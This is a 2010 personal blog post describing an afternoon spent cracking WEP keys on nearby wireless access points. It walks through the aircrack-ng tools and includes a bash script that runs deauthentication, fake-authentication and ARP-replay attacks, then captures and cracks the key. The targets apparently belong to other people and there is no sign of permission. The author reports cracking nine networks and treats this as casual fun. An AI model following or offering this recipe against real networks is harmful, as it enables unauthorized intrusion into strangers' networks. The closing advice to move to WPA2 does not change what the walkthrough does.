Sunday, April 18, 2010

An afternoon messin with WEP

I was bored this afternoon and decided that I needed to mess around with some WEP cracking. There were quite a few APs around me that were encrypted with WEP keys. It has been a while since I broke out the massive WEP attack book and I thought today would be a good refresher.

So first things first, I checked to make sure that my hardware was setup. I've got a Hawkings Technology HWU8DD usb wireless dish. This device uses the zd1211rw drivers which do not fully support all injection attacks. However, it's more than enough for any WEP attack that I played with today. I tested to make sure the device was working by running # iwlist wlan1 scanning >> scan.log then parsed through those results and picked out the first WEP secured AP that I saw in the list. I wrote down the mac address, the channel and the ESSID of the AP. 00:00:00:00:00:00 6 Secured

I changed directories into my build folder. $ cd ~/src. Then I pulled down the latest aircrack-ng sources from SVN.
$ svn co aircrack-ng
$ cd aircrack-ng
$ make
# make install
You could also just pull aircrack-ng out of your repos.

Now I was ready to rock and roll. The first thing that I did was to get my device in monitor mode. I know that my device doesn't really have a solid monitor mode, so I have to run # airmon-ng start wlan1 to get it to listen to everything. Now I was ready to play. I fired up vim and made a bash script to spam the AP.

$ vim ~/
#run as root
# run airmon-ng start $interface
# run airodump-ng in another terminal

aireplay-ng -e ${essid} -1 10 mon0 &
aireplay-ng -e ${essid} -0 50 mon0 &
aireplay-ng -e ${essid} -3 mon0 &


Changed the essid to the proper name, wrote and saved. I made a 'hack' directory $ mkdir ~/hack to dump all my packet captures into and changed directory into that directory. I fired up airodump-ng to listen to the channel of the AP and dump the IVS to a file and ran my script in another terminal.
# airodump-ng mon0 -i -w Secured -c 6
# /home/user/
I watched the IVS numbers in airodump-ng climb, waited about a min, and while still attacking the AP ran # aircrack /home/user/hack/Secured*.

I really didn't need to keep running the attack, in less than a minute I had captured enough information to crack the WEP key. I went on to crack 8 more APs in about an hour. Needless to say, if you using WEP expect to be hacked. Switch to something more secure such as WPA2.

No comments:

Post a Comment